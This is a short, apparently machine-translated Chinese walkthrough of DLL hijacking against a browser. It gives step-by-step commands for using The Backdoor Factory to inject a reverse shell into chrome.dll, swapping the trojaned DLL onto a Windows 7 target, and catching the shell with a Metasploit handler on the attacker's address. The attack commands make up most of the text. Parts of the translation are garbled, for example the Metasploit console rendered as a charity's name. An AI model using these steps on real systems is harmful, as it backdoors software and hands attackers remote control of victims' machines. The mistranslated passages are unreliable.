如果进程尝试加载DLL时未指定DLL的绝对路径,它将尝试搜索这些特定目录以找到DLL。 只要黑客能够将恶意DLL放置在优先于正常DLL的目录中,就可以被欺骗。 系统首先加载恶意DLL,实现“劫持”
例如:对于文件系统来说,如果打开的是doc文档,就会被应用程序打开,运行时会加载系统的一个dll文件。 如果我们用恶意dll替换系统dll文件,我们会将DLL和doc文档放在一起,运行时会在当前目录中找到DLL,并首先执行系统目录中的DLL。
SRC也接受此类DLL劫持漏洞
以下是某浏览器的DLL劫持
攻击机卡利192.168.123.182
目标机Win7 192.168.123.243
需要使用(线程分析工具)
还有某浏览器,哈哈哈,表弟们别当真。
首先找到浏览器,然后查看哪些DLL文件是随浏览器一起启动的
将.dll复制到kali中
攻击机卡利执行
git clone https://github.com/secretsquirrel/the-backdoor-factory #下载T-B-F
pip install capstone #cd到T-B-F目录安装capstone库
./backdoor.py -f /root/tbf/the-backdoor-factory/chrome.dll #在tbf里面找到backdoor.py脚本运行
扫描注入点
./backdoor.py -f /root/tbf/the-backdoor-factory/chrome.dll -s
这里总共扫描了83个注射点。 我们只需要随机选择一个注入点即可。
这里选择注入点,输入注入点前面的数字,然后回车。
选择后,会自动生成一个带shell的dll文件。
进入这个文件夹,反弹壳的dll文件就在这个文件夹里。
将.dll文件复制过去并替换原文件
打开无国界医生组织
msfconsole
use multi/handler
set payload windows/shell_reverse_tcp
set LPORT 4444
set LHOST 192.168.123.182
exploit
跑步
可以看到已经成功上线了。
重要的事情说三遍